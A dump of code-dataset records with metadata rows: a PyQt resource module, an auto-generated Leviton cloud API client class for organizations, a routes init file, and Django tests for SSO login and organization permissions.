\x3a\x00\x00\x00\x00\x49\x45\x4e\x44\xae\x42\x60\x82\
"
qt_resource_name = b"\
\x00\x07\
\x07\x3b\xe0\xb3\
\x00\x70\
\x00\x6c\x00\x75\x00\x67\x00\x69\x00\x6e\x00\x73\
\x00\x0e\
\x0f\xad\x61\xa8\
\x00\x49\
\x00\x6d\x00\x50\x00\x61\x00\x63\x00\x74\x00\x5f\x00\x74\x00\x6f\x00\x6f\x00\x6c\x00\x62\x00\x6f\x00\x78\
\x00\x08\
\x0a\x61\x5a\xa7\
\x00\x69\
\x00\x63\x00\x6f\x00\x6e\x00\x2e\x00\x70\x00\x6e\x00\x67\
"
qt_resource_struct_v1 = b"\
\x00\x00\x00\x00\x00\x02\x00\x00\x00\x01\x00\x00\x00\x01\
\x00\x00\x00\x00\x00\x02\x00\x00\x00\x01\x00\x00\x00\x02\
\x00\x00\x00\x14\x00\x02\x00\x00\x00\x01\x00\x00\x00\x03\
\x00\x00\x00\x36\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\
"
qt_resource_struct_v2 = b"\
\x00\x00\x00\x00\x00\x02\x00\x00\x00\x01\x00\x00\x00\x01\
\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x00\x00\x02\x00\x00\x00\x01\x00\x00\x00\x02\
\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x14\x00\x02\x00\x00\x00\x01\x00\x00\x00\x03\
\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x36\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\
\x00\x00\x01\x76\xe2\xd6\x9b\x60\
"
qt_version = [int(v) for v in QtCore.qVersion().split('.')]
if qt_version < [5, 8, 0]:
rcc_version = 1
qt_resource_struct = qt_resource_struct_v1
else:
rcc_version = 2
qt_resource_struct = qt_resource_struct_v2
def qInitResources():
QtCore.qRegisterResourceData(rcc_version, qt_resource_struct, qt_resource_name, qt_resource_data)
def qCleanupResources():
QtCore.qUnregisterResourceData(rcc_version, qt_resource_struct, qt_resource_name, qt_resource_data)
qInitResources()
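# Usage sketch (illustrative; the resource path below is decoded from the
# qt_resource_name table above, which encodes "plugins", "ImPact_toolbox",
# and "icon.png"):
#
#     from PyQt5.QtGui import QIcon
#     icon = QIcon(":/plugins/ImPact_toolbox/icon.png")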
| 41.714286
| 106
| 0.708904
| 883
| 4,088
| 3.238958
| 0.301246
| 0.228671
| 0.22972
| 0.172028
| 0.206643
| 0.206643
| 0.183217
| 0.183217
| 0.183217
| 0.183217
| 0
| 0.31319
| 0.068982
| 4,088
| 97
| 107
| 42.14433
| 0.438255
| 0.037182
| 0
| 0.135802
| 0
| 0.555556
| 0.000261
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0.024691
| false
| 0
| 0.012346
| 0
| 0.037037
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
1c27071b2c8b75a462d679f66d02df4a579fa0c8
| 20,888
|
py
|
Python
|
decora_wifi/models/organization.py
|
7ooL/api_decora
|
6a92a2d20c47e5b10702778255a863643cca3665
|
[
"MIT"
] | null | null | null |
decora_wifi/models/organization.py
|
7ooL/api_decora
|
6a92a2d20c47e5b10702778255a863643cca3665
|
[
"MIT"
] | null | null | null |
decora_wifi/models/organization.py
|
7ooL/api_decora
|
6a92a2d20c47e5b10702778255a863643cca3665
|
[
"MIT"
] | null | null | null |
# Leviton Cloud Services API model Organization.
# Auto-generated by api_scraper.py.
#
# Copyright 2017 Tim Lyakhovetskiy <tlyakhov@gmail.com>
#
# This code is released under the terms of the MIT license. See the LICENSE
# file for more details.
from ..base_model import BaseModel
class Organization(BaseModel):
def __init__(self, session, model_id=None):
super(Organization, self).__init__(session, model_id)
def add_person(self, attribs=None):
if attribs is None:
attribs = {}
api = "/Organizations/{0}/addPerson".format(self._id)
return self._session.call_api(api, attribs, 'post')
def cancel_subscription(self, attribs=None):
if attribs is None:
attribs = {}
api = "/Organizations/{0}/cancelSubscription".format(self._id)
return self._session.call_api(api, attribs, 'post')
@classmethod
def count(cls, session, attribs=None):
if attribs is None:
attribs = {}
api = "/Organizations/count"
return session.call_api(api, attribs, 'get')
def count_holidays(self, attribs=None):
if attribs is None:
attribs = {}
api = "/Organizations/{0}/holidays/count".format(self._id)
return self._session.call_api(api, attribs, 'get')
def count_invitations(self, attribs=None):
if attribs is None:
attribs = {}
api = "/Organizations/{0}/invitations/count".format(self._id)
return self._session.call_api(api, attribs, 'get')
def count_locations(self, attribs=None):
if attribs is None:
attribs = {}
api = "/Organizations/{0}/locations/count".format(self._id)
return self._session.call_api(api, attribs, 'get')
def count_management_tiers(self, attribs=None):
if attribs is None:
attribs = {}
api = "/Organizations/{0}/managementTiers/count".format(self._id)
return self._session.call_api(api, attribs, 'get')
def count_people(self, attribs=None):
if attribs is None:
attribs = {}
api = "/Organizations/{0}/people/count".format(self._id)
return self._session.call_api(api, attribs, 'get')
def count_permissions(self, attribs=None):
if attribs is None:
attribs = {}
api = "/Organizations/{0}/permissions/count".format(self._id)
return self._session.call_api(api, attribs, 'get')
def count_schedules(self, attribs=None):
if attribs is None:
attribs = {}
api = "/Organizations/{0}/schedules/count".format(self._id)
return self._session.call_api(api, attribs, 'get')
@classmethod
def create(cls, session, attribs=None):
if attribs is None:
attribs = {}
api = "/Organizations"
return session.call_api(api, attribs, 'post')
def create_holidays(self, attribs=None):
if attribs is None:
attribs = {}
api = "/Organizations/{0}/holidays".format(self._id)
return self._session.call_api(api, attribs, 'post')
def create_invitations(self, attribs=None):
if attribs is None:
attribs = {}
api = "/Organizations/{0}/invitations".format(self._id)
return self._session.call_api(api, attribs, 'post')
def create_locations(self, attribs=None):
if attribs is None:
attribs = {}
api = "/Organizations/{0}/locations".format(self._id)
return self._session.call_api(api, attribs, 'post')
def create_management_tiers(self, attribs=None):
if attribs is None:
attribs = {}
api = "/Organizations/{0}/managementTiers".format(self._id)
return self._session.call_api(api, attribs, 'post')
@classmethod
def create_many(cls, session, attribs=None):
if attribs is None:
attribs = {}
api = "/Organizations"
return session.call_api(api, attribs, 'post')
def create_people(self, attribs=None):
if attribs is None:
attribs = {}
api = "/Organizations/{0}/people".format(self._id)
return self._session.call_api(api, attribs, 'post')
def create_permissions(self, attribs=None):
if attribs is None:
attribs = {}
api = "/Organizations/{0}/permissions".format(self._id)
return self._session.call_api(api, attribs, 'post')
def create_schedules(self, attribs=None):
if attribs is None:
attribs = {}
api = "/Organizations/{0}/schedules".format(self._id)
return self._session.call_api(api, attribs, 'post')
def delete_by_id(self, attribs=None):
if attribs is None:
attribs = {}
api = "/Organizations/{0}".format(self._id)
return self._session.call_api(api, attribs, 'delete')
def delete_holidays(self, attribs=None):
if attribs is None:
attribs = {}
api = "/Organizations/{0}/holidays".format(self._id)
return self._session.call_api(api, attribs, 'delete')
def delete_invitations(self, attribs=None):
if attribs is None:
attribs = {}
api = "/Organizations/{0}/invitations".format(self._id)
return self._session.call_api(api, attribs, 'delete')
def delete_locations(self, attribs=None):
if attribs is None:
attribs = {}
api = "/Organizations/{0}/locations".format(self._id)
return self._session.call_api(api, attribs, 'delete')
def delete_management_tiers(self, attribs=None):
if attribs is None:
attribs = {}
api = "/Organizations/{0}/managementTiers".format(self._id)
return self._session.call_api(api, attribs, 'delete')
def delete_people(self, attribs=None):
if attribs is None:
attribs = {}
api = "/Organizations/{0}/people".format(self._id)
return self._session.call_api(api, attribs, 'delete')
def delete_permissions(self, attribs=None):
if attribs is None:
attribs = {}
api = "/Organizations/{0}/permissions".format(self._id)
return self._session.call_api(api, attribs, 'delete')
def delete_schedules(self, attribs=None):
if attribs is None:
attribs = {}
api = "/Organizations/{0}/schedules".format(self._id)
return self._session.call_api(api, attribs, 'delete')
def destroy_by_id_holidays(self, holiday_id, attribs=None):
if attribs is None:
attribs = {}
api = "/Organizations/{0}/holidays/{1}".format(self._id, holiday_id)
return self._session.call_api(api, attribs, 'delete')
def destroy_by_id_invitations(self, invitation_id, attribs=None):
if attribs is None:
attribs = {}
api = "/Organizations/{0}/invitations/{1}".format(self._id, invitation_id)
return self._session.call_api(api, attribs, 'delete')
def destroy_by_id_locations(self, location_id, attribs=None):
if attribs is None:
attribs = {}
api = "/Organizations/{0}/locations/{1}".format(self._id, location_id)
return self._session.call_api(api, attribs, 'delete')
def destroy_by_id_management_tiers(self, management_tier_id, attribs=None):
if attribs is None:
attribs = {}
api = "/Organizations/{0}/managementTiers/{1}".format(self._id, management_tier_id)
return self._session.call_api(api, attribs, 'delete')
def destroy_by_id_people(self, person_id, attribs=None):
if attribs is None:
attribs = {}
api = "/Organizations/{0}/people/{1}".format(self._id, person_id)
return self._session.call_api(api, attribs, 'delete')
def destroy_by_id_permissions(self, permission_id, attribs=None):
if attribs is None:
attribs = {}
api = "/Organizations/{0}/permissions/{1}".format(self._id, permission_id)
return self._session.call_api(api, attribs, 'delete')
def destroy_by_id_schedules(self, schedule_id, attribs=None):
if attribs is None:
attribs = {}
api = "/Organizations/{0}/schedules/{1}".format(self._id, schedule_id)
return self._session.call_api(api, attribs, 'delete')
def exists(self, attribs=None):
if attribs is None:
attribs = {}
api = "/Organizations/{0}/exists".format(self._id)
return self._session.call_api(api, attribs, 'get')
def exists_people(self, person_id, attribs=None):
if attribs is None:
attribs = {}
api = "/Organizations/{0}/people/rel/{1}".format(self._id, person_id)
return self._session.call_api(api, attribs, 'head')
@classmethod
def find(cls, session, attribs=None):
if attribs is None:
attribs = {}
api = "/Organizations"
items = session.call_api(api, attribs, 'get')
result = []
if items is not None:
for data in items:
model = Organization(session, data['id'])
model.data = data
result.append(model)
return result
def find_by_id(self, attribs=None):
if attribs is None:
attribs = {}
api = "/Organizations/{0}".format(self._id)
data = self._session.call_api(api, attribs, 'get')
self.data.update(data)
return self
def find_by_id_holidays(self, holiday_id, attribs=None):
if attribs is None:
attribs = {}
api = "/Organizations/{0}/holidays/{1}".format(self._id, holiday_id)
return self._session.call_api(api, attribs, 'get')
def find_by_id_invitations(self, invitation_id, attribs=None):
if attribs is None:
attribs = {}
api = "/Organizations/{0}/invitations/{1}".format(self._id, invitation_id)
data = self._session.call_api(api, attribs, 'get')
from .invitation import Invitation
model = Invitation(self._session, data['id'])
model.data = data
return model
def find_by_id_locations(self, location_id, attribs=None):
if attribs is None:
attribs = {}
api = "/Organizations/{0}/locations/{1}".format(self._id, location_id)
data = self._session.call_api(api, attribs, 'get')
from .location import Location
model = Location(self._session, data['id'])
model.data = data
return model
def find_by_id_management_tiers(self, management_tier_id, attribs=None):
if attribs is None:
attribs = {}
api = "/Organizations/{0}/managementTiers/{1}".format(self._id, management_tier_id)
data = self._session.call_api(api, attribs, 'get')
from .management_tier import ManagementTier
model = ManagementTier(self._session, data['id'])
model.data = data
return model
def find_by_id_people(self, person_id, attribs=None):
if attribs is None:
attribs = {}
api = "/Organizations/{0}/people/{1}".format(self._id, person_id)
data = self._session.call_api(api, attribs, 'get')
from .person import Person
model = Person(self._session, data['id'])
model.data = data
return model
def find_by_id_permissions(self, permission_id, attribs=None):
if attribs is None:
attribs = {}
api = "/Organizations/{0}/permissions/{1}".format(self._id, permission_id)
data = self._session.call_api(api, attribs, 'get')
from .permission import Permission
model = Permission(self._session, data['id'])
model.data = data
return model
def find_by_id_schedules(self, schedule_id, attribs=None):
if attribs is None:
attribs = {}
api = "/Organizations/{0}/schedules/{1}".format(self._id, schedule_id)
return self._session.call_api(api, attribs, 'get')
@classmethod
def find_one(cls, session, attribs=None):
if attribs is None:
attribs = {}
api = "/Organizations/findOne"
return session.call_api(api, attribs, 'get')
@classmethod
def generate_subscription_report(cls, session, attribs=None):
if attribs is None:
attribs = {}
api = "/Organizations/generateSubscriptionReport"
return session.call_api(api, attribs, 'post')
def refresh(self):
api = "/Organizations/{0}".format(self._id)
result = self._session.call_api(api, {}, 'get')
if result is not None:
self.data.update(result)
return self
def get_holidays(self, attribs=None):
if attribs is None:
attribs = {}
api = "/Organizations/{0}/holidays".format(self._id)
return self._session.call_api(api, attribs, 'get')
def get_invitations(self, attribs=None):
if attribs is None:
attribs = {}
api = "/Organizations/{0}/invitations".format(self._id)
items = self._session.call_api(api, attribs, 'get')
from .invitation import Invitation
result = []
if items is not None:
for data in items:
model = Invitation(self._session, data['id'])
model.data = data
result.append(model)
return result
def get_locations(self, attribs=None):
if attribs is None:
attribs = {}
api = "/Organizations/{0}/locations".format(self._id)
items = self._session.call_api(api, attribs, 'get')
from .location import Location
result = []
if items is not None:
for data in items:
model = Location(self._session, data['id'])
model.data = data
result.append(model)
return result
def get_management_tiers(self, attribs=None):
if attribs is None:
attribs = {}
api = "/Organizations/{0}/managementTiers".format(self._id)
items = self._session.call_api(api, attribs, 'get')
from .management_tier import ManagementTier
result = []
if items is not None:
for data in items:
model = ManagementTier(self._session, data['id'])
model.data = data
result.append(model)
return result
def get_people(self, attribs=None):
if attribs is None:
attribs = {}
api = "/Organizations/{0}/people".format(self._id)
items = self._session.call_api(api, attribs, 'get')
from .person import Person
result = []
if items is not None:
for data in items:
model = Person(self._session, data['id'])
model.data = data
result.append(model)
return result
def get_permissions(self, attribs=None):
if attribs is None:
attribs = {}
api = "/Organizations/{0}/permissions".format(self._id)
items = self._session.call_api(api, attribs, 'get')
from .permission import Permission
result = []
if items is not None:
for data in items:
model = Permission(self._session, data['id'])
model.data = data
result.append(model)
return result
def get_schedules(self, attribs=None):
if attribs is None:
attribs = {}
api = "/Organizations/{0}/schedules".format(self._id)
return self._session.call_api(api, attribs, 'get')
def get_subscription_plan(self, attribs=None):
if attribs is None:
attribs = {}
api = "/Organizations/{0}/subscriptionPlan".format(self._id)
return self._session.call_api(api, attribs, 'get')
def link_people(self, person_id, attribs=None):
if attribs is None:
attribs = {}
api = "/Organizations/{0}/people/rel/{1}".format(self._id, person_id)
data = self._session.call_api(api, attribs, 'put')
from .person import Person
model = Person(self._session, data['id'])
model.data = data
return model
def remove_person(self, attribs=None):
if attribs is None:
attribs = {}
api = "/Organizations/{0}/removePerson".format(self._id)
return self._session.call_api(api, attribs, 'post')
def replace_by_id(self, attribs=None):
if attribs is None:
attribs = {}
api = "/Organizations/{0}/replace".format(self._id)
return self._session.call_api(api, attribs, 'post')
@classmethod
def replace_or_create(cls, session, attribs=None):
if attribs is None:
attribs = {}
api = "/Organizations/replaceOrCreate"
return session.call_api(api, attribs, 'post')
def subscribe_to_plan(self, attribs=None):
if attribs is None:
attribs = {}
api = "/Organizations/{0}/subscribeToPlan".format(self._id)
return self._session.call_api(api, attribs, 'post')
def unlink_people(self, person_id, attribs=None):
if attribs is None:
attribs = {}
api = "/Organizations/{0}/people/rel/{1}".format(self._id, person_id)
return self._session.call_api(api, attribs, 'delete')
@classmethod
def update_all(cls, session, attribs=None):
if attribs is None:
attribs = {}
api = "/Organizations/update"
return session.call_api(api, attribs, 'post')
def update_attributes(self, attribs=None):
if attribs is None:
attribs = {}
api = "/Organizations/{0}".format(self._id)
data = self._session.call_api(api, attribs, 'put')
self.data.update(attribs)
return self
def update_by_id_holidays(self, holiday_id, attribs=None):
if attribs is None:
attribs = {}
api = "/Organizations/{0}/holidays/{1}".format(self._id, holiday_id)
return self._session.call_api(api, attribs, 'put')
def update_by_id_invitations(self, invitation_id, attribs=None):
if attribs is None:
attribs = {}
api = "/Organizations/{0}/invitations/{1}".format(self._id, invitation_id)
data = self._session.call_api(api, attribs, 'put')
from .invitation import Invitation
model = Invitation(self._session, data['id'])
model.data = data
return model
def update_by_id_locations(self, location_id, attribs=None):
if attribs is None:
attribs = {}
api = "/Organizations/{0}/locations/{1}".format(self._id, location_id)
data = self._session.call_api(api, attribs, 'put')
from .location import Location
model = Location(self._session, data['id'])
model.data = data
return model
def update_by_id_management_tiers(self, management_tier_id, attribs=None):
if attribs is None:
attribs = {}
api = "/Organizations/{0}/managementTiers/{1}".format(self._id, management_tier_id)
data = self._session.call_api(api, attribs, 'put')
from .management_tier import ManagementTier
model = ManagementTier(self._session, data['id'])
model.data = data
return model
def update_by_id_people(self, person_id, attribs=None):
if attribs is None:
attribs = {}
api = "/Organizations/{0}/people/{1}".format(self._id, person_id)
data = self._session.call_api(api, attribs, 'put')
from .person import Person
model = Person(self._session, data['id'])
model.data = data
return model
def update_by_id_permissions(self, permission_id, attribs=None):
if attribs is None:
attribs = {}
api = "/Organizations/{0}/permissions/{1}".format(self._id, permission_id)
data = self._session.call_api(api, attribs, 'put')
from .permission import Permission
model = Permission(self._session, data['id'])
model.data = data
return model
def update_by_id_schedules(self, schedule_id, attribs=None):
if attribs is None:
attribs = {}
api = "/Organizations/{0}/schedules/{1}".format(self._id, schedule_id)
return self._session.call_api(api, attribs, 'put')
@classmethod
def upsert(cls, session, attribs=None):
if attribs is None:
attribs = {}
api = "/Organizations"
data = session.call_api(api, attribs, 'put')
model = Organization(session, data['id'])
model.data = data
return model
@classmethod
def upsert_with_where(cls, session, attribs=None):
if attribs is None:
attribs = {}
api = "/Organizations/upsertWithWhere"
return session.call_api(api, attribs, 'post')
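# Usage sketch (illustrative; assumes the package's session type is
# DecoraWiFiSession with a login() method, and the credentials below are
# placeholders):
#
#     from decora_wifi import DecoraWiFiSession
#     session = DecoraWiFiSession()
#     session.login("user@example.com", "password")
#     for org in Organization.find(session):
#         print(org.data.get("name"))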
| 35.890034
| 91
| 0.606281
| 2,462
| 20,888
| 4.978067
| 0.048741
| 0.071802
| 0.083388
| 0.101257
| 0.926811
| 0.925098
| 0.918326
| 0.914572
| 0.89393
| 0.889034
| 0
| 0.005999
| 0.273841
| 20,888
| 581
| 92
| 35.951807
| 0.802017
| 0.011059
| 0
| 0.780335
| 1
| 0
| 0.119576
| 0.096813
| 0
| 0
| 0
| 0
| 0
| 1
| 0.154812
| false
| 0
| 0.035565
| 0
| 0.345188
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
1c2cb8e49b96fe48c28fbd234c1b58fd0fec13be
| 58
|
py
|
Python
|
app/routes/__init__.py
|
Luca-A-Magalhaes/himcd
|
56c939bb077485adb8a75b37bf0655e1087bbfa4
|
[
"MIT"
] | 2
|
2021-02-15T21:02:12.000Z
|
2021-10-14T19:05:34.000Z
|
app/routes/__init__.py
|
Luca-A-Magalhaes/himcd
|
56c939bb077485adb8a75b37bf0655e1087bbfa4
|
[
"MIT"
] | null | null | null |
app/routes/__init__.py
|
Luca-A-Magalhaes/himcd
|
56c939bb077485adb8a75b37bf0655e1087bbfa4
|
[
"MIT"
] | null | null | null |
from app.routes.api import *
from app.routes.page import *
| 29
| 29
| 0.775862
| 10
| 58
| 4.5
| 0.6
| 0.311111
| 0.577778
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.12069
| 58
| 2
| 29
| 29
| 0.882353
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
1c687875cc68d1f377808ccf608076fc58094fbc
| 10,254
|
py
|
Python
|
mc2/tests/test_sso.py
|
praekeltfoundation/mc2
|
5367a8aed309fade0f17bc72efa099b0afc76aa7
|
[
"BSD-2-Clause"
] | 4
|
2016-03-09T00:51:17.000Z
|
2017-10-05T23:54:00.000Z
|
mc2/tests/test_sso.py
|
praekeltfoundation/mc2
|
5367a8aed309fade0f17bc72efa099b0afc76aa7
|
[
"BSD-2-Clause"
] | 131
|
2015-11-19T16:45:23.000Z
|
2018-07-24T09:36:08.000Z
|
mc2/tests/test_sso.py
|
praekeltfoundation/mc2
|
5367a8aed309fade0f17bc72efa099b0afc76aa7
|
[
"BSD-2-Clause"
] | 2
|
2016-07-30T15:36:23.000Z
|
2017-09-18T12:40:11.000Z
|
from django.test import TestCase, Client
from django.contrib.auth.models import User
from mc2 import permissions
from mc2.organizations.models import Organization, OrganizationUserRelation
from mc2.controllers.docker.models import DockerController
import pytest
@pytest.mark.django_db
class LoginTest(TestCase):
def test_email_login_successful(self):
user = User.objects.create_user(
first_name='foo', username="foo@example.com",
email="foo@example.com", password="1234")
client = Client()
response = client.get('/')
self.assertRedirects(response, '/login/?next=/')
response = client.post(
'/login/?next=/', {'username': user.username, 'password': '1234'})
self.assertRedirects(response, '/')
def test_email_login_unsuccessful(self):
user = User.objects.create_user(
first_name='foo', username="foo@example.com",
email="foo@example.com", password="1234")
client = Client()
response = client.get('/')
self.assertRedirects(response, '/login/?next=/')
response = client.post(
'/login/?next=/', {'username': user.username, 'password': '123'})
self.assertContains(response, 'name or password is not correct')
def test_email_login_sso(self):
user = User.objects.create_user(
first_name='foo', username="foo@example.com",
email="foo@example.com", password="1234")
client = Client()
response = client.get(
'/login?service=http%3A%2F%2Ftestapp.com%2F'
'admin%2Flogin%2F%3Fnext%3D%252Fadmin%252F')
self.assertContains(response, 'Welcome to Mission Control')
response = client.post(
('/login?service=http%3A%2F%2Ftestapp.com%2F'
'admin%2Flogin%2F%3Fnext%3D%252Fadmin%252F'),
{'username': user.username, 'password': '1234'})
        self.assertEqual(
response.request.get('QUERY_STRING'),
('service=http%3A%2F%2Ftestapp.com%2Fadmin%2Flogin'
'%2F%3Fnext%3D%252Fadmin%252F'))
def test_login_sso_redirects_to_home_when_no_service(self):
user = User.objects.create_user(
first_name='foo', username="foo@example.com",
email="foo@example.com", password="1234")
client = Client()
response = client.post(
('/login?service=None'),
{'username': user.username, 'password': '1234'}, follow=True)
self.assertRedirects(response, '/')
@pytest.mark.django_db
class CustomAttributesTest(TestCase):
def setUp(self):
self.user = User.objects.create_user(
'testuser', 'test@email.com', '1234')
self.client = Client()
def test_group_access(self):
user = User.objects.create(first_name='foo')
attr = permissions.org_permissions(user, 'http://foobar.com/')
self.assertEqual(attr['has_perm'], False)
def test_user_details(self):
user = User.objects.create(first_name='foo', email='foo@email.com')
attr = permissions.org_permissions(user, 'http://foobar.com/')
self.assertEqual(attr['givenName'], 'foo')
self.assertEqual(attr['email'], 'foo@email.com')
def test_org_admin_must_have_superuser_access(self):
user = User.objects.create_user('joe', 'joe@email.com', '1234')
org = Organization.objects.create(name='Test', slug='test')
OrganizationUserRelation.objects.create(
user=user, organization=org, is_admin=True)
DockerController.objects.create(
name='my test app', organization=org,
owner=user, domain_urls='foobar.com')
self.client.login(username='joe', password='1234')
attr = permissions.org_permissions(user, 'http://foobar1.com/')
self.assertEqual(attr['has_perm'], False)
self.assertEqual(attr['is_admin'], False)
attr = permissions.org_permissions(user, 'http://foobar.com/')
self.assertEqual(attr['has_perm'], True)
self.assertEqual(attr['is_admin'], True)
def test_super_user_must_have_super_user_access(self):
org = Organization.objects.create(name='Test', slug='test')
OrganizationUserRelation.objects.create(
user=self.user, organization=org, is_admin=True)
joe = User.objects.create_superuser('joe', 'joe@email.com', '1234')
self.client.login(username='joe', password='1234')
attr = permissions.org_permissions(joe, 'http://foobar.com/')
self.assertEqual(attr['has_perm'], True)
self.assertEqual(attr['is_admin'], True)
attr = permissions.org_permissions(joe, 'http://test-app.molo.site/')
self.assertEqual(attr['has_perm'], True)
self.assertEqual(attr['is_admin'], True)
def test_user_in_org_must_have_access(self):
org = Organization.objects.create(name='Test', slug='test')
OrganizationUserRelation.objects.create(
user=self.user, organization=org, is_admin=True)
DockerController.objects.create(
name='my test app', organization=org,
owner=self.user, domain_urls='test-app.molo.site my.domain.com')
# joe is a normal user in the org (is_admin = False)
joe = User.objects.create_user('joe', 'joe@email.com', '1234')
OrganizationUserRelation.objects.create(
user=joe, organization=org)
# create the controller as testuser
self.client.login(username='testuser', password='1234')
attr = permissions.org_permissions(joe, 'http://foobar.com/')
self.assertEqual(attr['has_perm'], False)
self.assertEqual(attr['is_admin'], False)
attr = permissions.org_permissions(joe, 'http://test-app.molo.site/')
self.assertEqual(attr['has_perm'], True)
self.assertEqual(attr['is_admin'], False)
def test_app_admin_user_in_org_must_have_admin_access_for_the_app(self):
org = Organization.objects.create(name='Test', slug='test')
OrganizationUserRelation.objects.create(
user=self.user, organization=org, is_admin=True)
DockerController.objects.create(
name='my test app', organization=org,
owner=self.user, domain_urls='test-app.molo.site my.domain.com')
# joe is an app admin user in the org (is_app_admin = True)
joe = User.objects.create_user('joe', 'joe@email.com', '1234')
OrganizationUserRelation.objects.create(
user=joe, organization=org, is_app_admin=True)
# create the controller as testuser
self.client.login(username='testuser', password='1234')
attr = permissions.org_permissions(joe, 'http://foobar.com/')
self.assertEqual(attr['has_perm'], False)
self.assertEqual(attr['is_admin'], False)
attr = permissions.org_permissions(joe, 'http://test-app.molo.site/')
self.assertEqual(attr['has_perm'], True)
self.assertEqual(attr['is_admin'], True)
def test_user_in_other_org_must_not_have_cross_access(self):
org = Organization.objects.create(name='Test', slug='test')
OrganizationUserRelation.objects.create(
user=self.user, organization=org, is_admin=True)
# joe is a normal user in the org (is_admin = False)
joe = User.objects.create_user('joe', 'joe@email.com', '1234')
OrganizationUserRelation.objects.create(
user=joe, organization=org)
DockerController.objects.create(
name='my test app', organization=org,
owner=self.user, domain_urls='foobar.com')
# sam is a normal user in other org
sam = User.objects.create_user('sam', 'sam@email.com', '1234')
other_org = Organization.objects.create(name='Other', slug='other')
OrganizationUserRelation.objects.create(
user=sam, organization=other_org)
DockerController.objects.create(
name='my test app', organization=other_org,
owner=self.user, domain_urls='test-app.molo.site')
attr = permissions.org_permissions(joe, 'http://foobar.com/')
self.assertEqual(attr['has_perm'], True)
self.assertEqual(attr['is_admin'], False)
attr = permissions.org_permissions(sam, 'http://foobar.com/')
self.assertEqual(attr['has_perm'], False)
self.assertEqual(attr['is_admin'], False)
attr = permissions.org_permissions(joe, 'http://test-app.molo.site/')
self.assertEqual(attr['has_perm'], False)
self.assertEqual(attr['is_admin'], False)
attr = permissions.org_permissions(sam, 'http://test-app.molo.site/')
self.assertEqual(attr['has_perm'], True)
self.assertEqual(attr['is_admin'], False)
# tom is an admin user in other org
tom = User.objects.create_user('tom', 'tom@email.com', '1234')
OrganizationUserRelation.objects.create(
user=tom, organization=other_org, is_admin=True)
attr = permissions.org_permissions(tom, 'http://foobar.com/')
self.assertEqual(attr['has_perm'], False)
self.assertEqual(attr['is_admin'], False)
attr = permissions.org_permissions(tom, 'http://test-app.molo.site/')
self.assertEqual(attr['has_perm'], True)
self.assertEqual(attr['is_admin'], True)
attr = permissions.org_permissions(sam, 'http://test-app.molo.site/')
self.assertEqual(attr['has_perm'], True)
self.assertEqual(attr['is_admin'], False)
def test_access_using_generic_domain(self):
user = User.objects.create_user('joe', 'joe@email.com', '1234')
org = Organization.objects.create(name='Test', slug='test')
OrganizationUserRelation.objects.create(
user=user, organization=org, is_admin=True)
self.client.login(username='joe', password='1234')
controller = DockerController.objects.create(
name='my test app', organization=org,
owner=self.user, slug='test-app')
attr = permissions.org_permissions(
user, 'http://%s.seed.p16n.org/admin/' % controller.app_id)
self.assertEqual(attr['has_perm'], True)
self.assertEqual(attr['is_admin'], True)
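# Editor's note: the tests above pin down the expected contract of
# permissions.org_permissions. Below is a minimal sketch of a helper that
# would satisfy them -- an assumption-laden reconstruction, not the project's
# actual implementation; it presumes the Django models used above and that
# OrganizationUserRelation has an is_app_admin field defaulting to False.
from urllib.parse import urlparse

def org_permissions_sketch(user, url):
    # Resolve the host from the URL and look for a controller in one of the
    # user's organizations whose space-separated domain_urls, or generic
    # <app_id>.seed.p16n.org domain, matches it.
    host = urlparse(url).hostname
    for relation in OrganizationUserRelation.objects.filter(user=user):
        for controller in DockerController.objects.filter(
                organization=relation.organization):
            domains = (controller.domain_urls or '').split()
            domains.append('%s.seed.p16n.org' % controller.app_id)
            if host in domains:
                return {
                    'has_perm': True,
                    'is_admin': bool(relation.is_admin or relation.is_app_admin),
                }
    return {'has_perm': False, 'is_admin': False}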
| 42.903766
| 78
| 0.646577
| 1,218
| 10,254
| 5.311166
| 0.101806
| 0.078374
| 0.102798
| 0.080693
| 0.820683
| 0.775854
| 0.742
| 0.72175
| 0.710311
| 0.700727
| 0
| 0.016727
| 0.212893
| 10,254
| 238
| 79
| 43.084034
| 0.784785
| 0.028769
| 0
| 0.657609
| 0
| 0
| 0.17968
| 0.024319
| 0
| 0
| 0
| 0
| 0.228261
| 1
| 0.070652
| false
| 0.076087
| 0.032609
| 0
| 0.11413
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 7
| 98d26459d39efcaa7ff3bba07e564e9b9b0b8ad3
| 179
| py
| Python
| tests/test_version.py
| LucaCappelletti94/setup_python_package
| 61b5f3cff1ed3181f932293c63c4fcb71cbe0062
| ["MIT"] | 5
| 2019-09-17T14:46:35.000Z
| 2020-06-06T08:17:02.000Z
| tests/test_version.py
